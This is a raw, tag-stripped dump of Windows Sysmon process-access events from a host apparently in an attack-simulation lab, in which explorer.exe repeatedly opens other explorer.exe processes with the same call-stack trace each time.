16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241626Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241625Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241624Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241623Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241622Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241621Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241620Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241619Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241618Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241617Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241616Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241615Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241614Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241613Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241612Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241611Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241610Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241609Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241608Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241607Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.701{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241606Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 